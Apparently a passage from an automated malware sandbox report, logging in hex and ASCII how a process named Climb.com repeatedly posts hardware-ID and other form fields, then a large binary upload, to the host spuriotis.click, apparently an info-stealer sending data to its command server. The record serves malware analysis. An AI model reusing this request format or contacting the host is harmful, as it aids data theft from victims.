                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGZQmWDcYotFsTQu87hGi8RUN%2BTCYH72LtcpezUH1qMhDie%2B6IO%2Ff3O1g2VbdfwIS0dEMIva%2BvZUVhVqwbFVawJxJLJPJfaX0VjqkcSwQf9PeToSP29OMQMXXzYIORU%2Flho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f905739afb24273-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2184&min_rtt=2181&rtt_var=824&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13718&delivery_rate=1324263&cwnd=32&unsent_bytes=0&cid=27008dd1dfd14530&ts=901&x=0"
                                                                                                                                                                        2024-12-28 08:57:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:57:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.1249723104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:06 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=7H5VWCKKRPBASPSM
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 15058
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:06 UTC15058OUTData Raw: 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 35 56 57 43 4b 4b 52 50 42 41 53 50 53 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 37 48 35 56
                                                                                                                                                                        Data Ascii: --7H5VWCKKRPBASPSMContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--7H5VWCKKRPBASPSMContent-Disposition: form-data; name="pid"2--7H5VWCKKRPBASPSMContent-Disposition: form-data; name="lid"5FwhVM--lll--7H5V
                                                                                                                                                                        2024-12-28 08:57:07 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:07 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=8bs01kvhv5q5dv2dvfk7lmv313; expires=Wed, 23 Apr 2025 02:43:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RMv3Q8SjjSv53hnhyRIBghrnmbOav2E1xVXEgFQzuLtpCy%2BOm3%2FWmMaVfDL7t3hr59Jcoau4a7akY2heOGJzEKeziblFdmilKI8egqbm7L2EFafVuW%2FD7uklVIbuCV%2Fn3o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f905747bab24406-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1664&rtt_var=655&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15995&delivery_rate=1631284&cwnd=186&unsent_bytes=0&cid=bbfda4c54f5e045a&ts=886&x=0"
                                                                                                                                                                        2024-12-28 08:57:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:57:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.1249724104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:08 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=C4T4PAUKBR25MP
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 20221
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:08 UTC15331OUTData Raw: 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52 32 35 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 43 34 54 34 50 41 55 4b 42 52
                                                                                                                                                                        Data Ascii: --C4T4PAUKBR25MPContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--C4T4PAUKBR25MPContent-Disposition: form-data; name="pid"3--C4T4PAUKBR25MPContent-Disposition: form-data; name="lid"5FwhVM--lll--C4T4PAUKBR
                                                                                                                                                                        2024-12-28 08:57:08 UTC4890OUTData Raw: 00 00 00 00 00 00 d0 e7 46 a2 c3 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 30 1c 1d 16 fb 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii: Fb}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>|0~
                                                                                                                                                                        2024-12-28 08:57:09 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:09 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=7mccbkakfdtp4l8b7j0lf1n0gq; expires=Wed, 23 Apr 2025 02:43:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MoOnREj5AP3R9pt%2FVr2WRBazMyU5%2Fqq%2BM3PY7Re8sCy6SkEJLM4clDVJYcazUuYTsWxg8TBqLuJ3nH6g2bzdOntrv%2F2vLa5FJH8AJPjZ6lbSf9fbK%2FI4uxlF%2BMXTgKsZnLg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9057569fcc7cb2-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1937&rtt_var=730&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21178&delivery_rate=1507485&cwnd=216&unsent_bytes=0&cid=e8991803cb69b078&ts=1008&x=0"
                                                                                                                                                                        2024-12-28 08:57:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:57:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.1249725104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:11 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=FIHNBRZDAAYIUN
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1205
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:11 UTC1205OUTData Raw: 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41 59 49 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 49 48 4e 42 52 5a 44 41 41
                                                                                                                                                                        Data Ascii: --FIHNBRZDAAYIUNContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--FIHNBRZDAAYIUNContent-Disposition: form-data; name="pid"1--FIHNBRZDAAYIUNContent-Disposition: form-data; name="lid"5FwhVM--lll--FIHNBRZDAA
                                                                                                                                                                        2024-12-28 08:57:12 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:57:11 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=rsh0rt9jr4g04ucdltkg1cjnkk; expires=Wed, 23 Apr 2025 02:43:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJxpStfSe%2B%2FV0f9n3mRB21ZDtCsUu3oN%2FXMbQpTaDqIW37vjPzFT8tX3fUqPmQ5ic%2FIQFPAaYp9%2BoibHbRwFLlpZx%2BAMlQOovOiHCdFhoX%2BIkWvsqJIyaST64RBTg4v7mPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9057660acac443-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1649&rtt_var=629&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2117&delivery_rate=1725768&cwnd=244&unsent_bytes=0&cid=071967ffe44a4fdb&ts=850&x=0"
                                                                                                                                                                        2024-12-28 08:57:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-28 08:57:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.1249726104.21.2.514436996C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:57:13 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=10Z7J3JV28FW6XX
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 571886
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 30 5a 37 4a 33 4a 56 32 38 46 57 36 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 31 30 5a 37 4a 33 4a
                                                                                                                                                                        Data Ascii: --10Z7J3JV28FW6XXContent-Disposition: form-data; name="hwid"8B0503D077510067D9AC212D15D33917--10Z7J3JV28FW6XXContent-Disposition: form-data; name="pid"1--10Z7J3JV28FW6XXContent-Disposition: form-data; name="lid"5FwhVM--lll--10Z7J3J
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 94 9a a2 27 75 25 b1 7c 32 ae 2e b9 98 51 f9 59 ba 68 84 cf e8 61 f8 a1 5e 6c ac f8 83 22 6e 31 1e 8c a3 da a7 78 bf 0c 55 e9 06 09 9c 3b 52 c4 ab 10 91 15 af 7f c3 84 d0 bf 3f 1a f6 93 98 15 a2 33 50 ed 93 eb 62 7d 45 c3 91 0c 11 a2 9a ee 94 01 c0 d8 9e a8 c0 9d 26 51 32 e6 8d 0c 63 22 ec 09 cf 93 ad 55 e9 7d 4b e6 70 cc 20 cc 16 12 dc 92 c0 f4 a1 e1 78 ee ad 48 8d 8f d7 c7 6d e3 d4 c7 95 5e 7e 71 60 3e 73 b0 66 d9 d3 a5 e3 b6 6f f9 3d 9e 83 83 d2 4e dc 78 51 eb 07 be 6b 15 9a 1b 4b 7f dc e5 76 24 40 99 a8 48 56 18 09 16 98 a6 e4 6b ba 36 90 3a b0 17 19 d9 fd 7e 92 3b 8d d2 e6 37 2c b8 87 c6 a2 b7 eb c3 f6 59 1a 62 e1 59 7c 09 25 79 85 7d a5 18 92 54 fa fa aa e5 45 33 b5 82 2f d6 3d fd 9e dc 1f 93 f3 75 bf d6 9f 4a 0f 47 84 26 62 77 95 96 44 92 44 bf 22
                                                                                                                                                                        Data Ascii: 'u%|2.QYha^l"n1xU;R?3Pb}E&Q2c"U}Kp xHm^~q`>sfo=NxQkKv$@HVk6:~;7,YbY|%y}TE3/=uJG&bwDD"
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 7c a0 25 a5 a0 92 dd 3c d1 f9 e8 63 78 85 e8 6d fa 0f 5f d1 a8 17 a5 bc f7 3f 22 09 5d 1d ec 17 0e 04 8f de 4e c3 f9 03 99 6b 0b 6f 86 ab 7b 3f a8 92 1a 8e ec be c3 ee 2c ab 1d 4f ac f6 2a aa 9a 5f 0f 19 f6 2a 1b 99 0c e7 ae 64 56 55 2d 6c 7e 08 f1 9b 3d 5a 46 fe f2 f7 6b 88 f1 2e 80 fb c9 49 eb a7 59 c0 7f 3f 32 cb 57 3a f4 d5 e1 ba 02 ee e2 79 d6 60 66 e0 ce d0 17 31 e7 8d 43 0a 72 52 4b 9b 3f 6e af d1 47 ff 55 13 36 71 fe fa 7a 23 43 74 6c f9 be 43 f5 fc b7 70 d6 d8 53 c1 9a 8e df 6b 26 7f 52 f8 56 c3 e9 a8 62 16 69 cf 8d a4 3d f4 2e 7f 95 db d7 87 85 ad 8c 39 25 0e 55 77 df 0d 95 dc fc 67 88 bd 5e 55 cf 9f c3 52 0e 1b 8d fc ea 61 60 51 de 11 f9 60 bf 77 50 10 ec d7 38 f9 6c 87 91 f7 a7 7d 18 98 5b b5 8f 71 26 3f ce 63 1f 83 7c e6 38 08 f5 fa 55 58 5f
                                                                                                                                                                        Data Ascii: |%<cxm_?"]Nko{?,O*_*dVU-l~=ZFk.IY?2W:y`f1CrRK?nGU6qz#CtlCpSk&RVbi=.9%Uwg^URa`Q`wP8l}[q&?c|8UX_
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 5c a8 d4 77 85 34 a9 1d fa 13 8b dd 0e f0 e1 bf b4 f9 27 7d d5 eb 1b 5f 72 e3 98 02 d6 85 48 56 c5 dc 2b c7 64 31 f1 be 88 4d 92 6e 5a 4a 75 a5 8c 67 43 6f 40 51 33 f4 2f 73 e2 cf 16 58 ea b3 7c 0a a3 cd f8 d9 84 c3 00 b3 ee cf 68 ba e7 d6 e9 c3 8d bc f3 5f 51 91 d6 cf 77 48 be 98 01 c0 b3 53 71 06 f3 95 93 75 cf 7f 73 59 ff 4d e4 f4 69 df 52 4a d6 46 37 ed b2 de 78 4f cb e8 0b 49 df 73 61 f0 e7 d5 78 36 0c 71 4b 46 71 1e ab 6e c7 74 e0 5d 5c f0 e4 ab 0b 66 06 2b b2 b6 a3 76 54 07 47 4b 9c 8d 0a 48 e6 2e 7b 9a ae dd fb 42 fd c9 1a c8 33 a5 cf 3d 2a de b9 bb ff eb 90 fd 76 80 fe 4e 61 09 18 4e fc 8c 24 d1 14 68 46 fc 40 97 1f 8a e6 05 13 e5 d9 1a e8 6e 1e e6 2c 02 28 21 29 f8 6b 52 c7 93 f9 ab 32 25 80 26 1c 01 81 1e a1 73 c5 3c 50 0e 7f 3b 1a 21 04 04 84
                                                                                                                                                                        Data Ascii: \w4'}_rHV+d1MnZJugCo@Q3/sX|h_QwHSqusYMiRJF7xOIsax6qKFqnt]\f+vTGKH.{B3=*vNaN$hF@n,(!)kR2%&s<P;!
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 6c 70 88 c9 59 3c ae 09 d1 ce f0 da 4d b3 dd 12 c3 bf 2e 25 a9 63 fa 34 c4 81 cb 53 a9 d3 57 c1 14 6b 87 a7 fe 81 b6 6e 62 8b f9 15 aa fa 85 1a 83 6a a3 56 c6 4a 44 eb ff b6 ae 23 b8 ee 5a 66 9c 0a 8f 50 a9 3a 9d 89 01 59 e5 88 37 ff 4f a8 fe 3f 39 db 00 4e 33 b3 a5 88 80 39 0c b8 86 9e 1a b1 97 84 9a 5e 6e 77 fd e2 04 2c e0 80 1c 43 42 76 c3 8e 25 02 84 6e e7 ab 42 41 4a 70 ba f0 8a 01 20 23 c2 44 c1 81 ae 3b c0 b4 bb 3e 18 c3 56 43 b5 9c f2 37 2a 1c 6a 99 c3 ff 33 89 ea 45 1f 1d 6a 15 2f 40 c6 bc 92 20 7f 30 83 70 f2 19 75 21 46 df e5 82 5e cf e6 bb 8b e2 88 32 e4 34 2d b6 15 d7 eb 28 9c 3c 68 98 52 1d ab 74 43 74 0a 25 60 41 a4 22 36 0f 2f b5 d3 11 44 f6 45 1f eb cd d9 8f 9b e1 ba dc 9d b5 0a 2a 6c 0a 88 95 9c c4 cd bd 7e c8 66 6b c4 d1 e1 5b fc 45 41
                                                                                                                                                                        Data Ascii: lpY<M.%c4SWknbjVJD#ZfP:Y7O?9N39^nw,CBv%nBAJp #D;>VC7*j3Ej/@ 0pu!F^24-(<hRtCt%`A"6/DE*l~fk[EA
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 8d 2c f8 4d ab 26 a0 ae 68 36 52 21 06 9b bb cc 5d 83 83 4f 68 59 42 9a 96 24 08 ca 9f cb fd 6f 9d 5d bf 5d 33 af 70 19 dc f1 7b c6 e7 3b 32 0e f3 47 fa df 99 89 02 00 70 84 81 46 22 14 0a 98 eb 53 53 0f 46 d2 ce c3 f9 e1 75 d8 13 ca 8d ce db 3d 10 57 bd ff b0 01 58 c3 e6 29 f0 ea 8f 91 9b 43 14 01 f0 6a a9 0d 49 57 60 d1 53 42 7f 95 1e 30 c0 4e 05 68 20 21 5e c4 21 84 09 95 7e 8f c9 3d 4d 88 89 ac f6 fd d2 2a f0 42 df 5b f2 66 cb c8 df 37 ec 58 55 1d 87 1c 85 85 eb 9f eb dd 2a bd fe 06 22 8f 6f 5c de 23 03 b4 6f 0e 4d fc 83 d9 f8 0a 31 ca aa 8f e1 18 82 63 3a 18 21 68 a1 51 a8 57 f2 a7 2c bd 71 cf a5 33 b9 58 df c2 82 1a 02 ff 1c 1c 9f 58 a6 23 1a 5e df 06 db 65 a3 f2 10 59 7d f1 20 b6 f3 af e4 e4 af 20 3b 10 bc 31 25 15 0d bc 62 9c 05 e4 3c fc 95 54 01
                                                                                                                                                                        Data Ascii: ,M&h6R!]OhYB$o]]3p{;2GpF"SSFu=WX)CjIW`SB0Nh !^!~=M*B[f7XU*"o\#oM1c:!hQW,q3XX#^eY} ;1%b<T
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 5c fb 81 39 65 46 a8 3b 51 60 10 9f 5a 77 dc 67 6d 5f 8b 99 8a e4 26 a0 56 e4 be 94 ed 66 c3 41 50 a7 16 53 aa 5f c0 7b 92 eb b7 a7 18 1b d2 3a ff 85 2e c8 48 2a e6 62 51 8a 76 3c 88 83 92 f5 b5 0f 21 32 bb 80 ed 92 ba e5 01 31 0c 8c 3f 1b 6e 6f 4a a8 b4 7a 2e 0e 7f 16 48 63 fd 76 65 fd fe a7 ae e6 59 04 77 33 67 7b 92 a3 f4 c6 b5 46 91 63 16 cc 52 58 38 b2 b1 c7 9a 6d 1e bf 18 ce 6a 4b dc 51 8f a1 a8 0f 31 a8 0c c2 78 e3 df 6f 5f fc 7a 61 43 b7 7b 05 eb 3e f3 1a 77 19 d9 7f 4a dd 68 75 86 be cc fa 67 b7 d4 00 55 95 a1 83 9d ea e1 01 35 cb df 7f 7a de bc 14 62 69 45 28 8a db ac c0 44 cd bf 51 3d 7d ff c4 9d 79 a7 3e 4f bf dc 9e a7 2d 02 01 74 df 9b 4a 81 78 6d 71 d9 35 a5 bd 28 7c f4 6a e1 a3 0a 54 f6 95 20 c6 e8 31 b5 b0 de ef 82 de 6a 7f 4c f2 a8 9d 76
                                                                                                                                                                        Data Ascii: \9eF;Q`Zwgm_&VfAPS_{:.H*bQv<!21?noJz.HcveYw3g{FcRX8mjKQ1xo_zaC{>wJhugU5zbiE(DQ=}y>O-tJxmq5(|jT 1jLv
                                                                                                                                                                        2024-12-28 08:57:13 UTC15331OUTData Raw: 37 c4 9f 21 55 f9 28 c3 df 34 3e 57 a7 ad cc 1d 9a 9c d3 61 ee 1e fe b6 7a 94 9f 33 64 32 73 ac fe 26 bb 9a 14 2c f8 6e 3b 48 97 50 87 8e 35 01 70 54 07 4c 77 ee ac 88 83 48 ce 31 af 3d 58 3d 6f 26 01 5a 46 54 68 35 f7 ef d3 1e 88 9a 86 7f e7 ee 53 49 2d 90 70 dd fa e2 91 6b 0d 32 5e a6 f7 b7 48 b4 88 d5 37 33 c5 c5 29 22 2b c7 b3 0b fb 2a 1b 9e 17 16 ff b4 46 30 a5 51 19 9f 1b 58 ff 09 c1 c3 d1 f0 09 51 60 c7 fe 00 09 9e 54 54 e9 01 24 e8 94 02 cd a6 bd 76 9b 93 24 23 21 2a b9 c5 02 30 5f dd 1f 0c fa 5a 57 09 53 a4 13 02 10 70 22 e7 c5 93 1a 1f ee 55 0c df 47 da 69 0c 19 74 7b e3 2c 48 d7 c4 5d c6 40 c2 40 86 a7 01 b4 f4 d7 1f 62 19 6e 8e 07 e0 61 fd 21 a6 97 c4 e3 ca 32 49 20 c4 74 94 a6 33 d1 4d fa 08 26 83 b7 86 39 7b 89 7d 79 2f 63 3f ef 1c 79 f3 e4
